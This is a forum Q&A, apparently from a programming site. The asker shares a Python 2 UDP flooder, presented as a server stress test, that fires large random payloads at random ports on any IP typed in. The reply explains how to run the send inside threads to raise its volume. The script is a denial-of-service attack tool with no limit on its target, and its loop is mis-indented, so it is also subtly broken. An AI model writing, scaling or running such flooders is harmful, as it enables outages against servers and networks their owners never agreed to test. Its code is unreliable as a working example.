# Implementing Multi-Threading in a Python Script

Tags: python

I wanted to create a python script to stress test my servers.
So I created this basic UDP flooder and I think I have it working correctly.

My question is how would I go about adding multi-threading to this?
I read a manual on Python threading but didn't understand how to actually
implement it into my script.

```
import socket
import random

print "Target:",
ipaddr = raw_input()

sent = 1
bytes = random._urandom(10000)
port = 1

while sent > 0:
    print "Test Started On", ipaddr, "|", sent, "Packets Sent. Press Ctrl+C To Stop."
    sent += 1
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(bytes,(ipaddr,port))
port = random.randint(1, 65500)

raw_input()
```

Answer (score 1):

If you extract the business part of your application into a function like:

```
def do_the_flooding():
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.sendto(bytes,(ipaddr,port))
```

You can then call it in a thread:

```
import threading
t = threading.Thread(target=do_the_flooding)
t.start()
```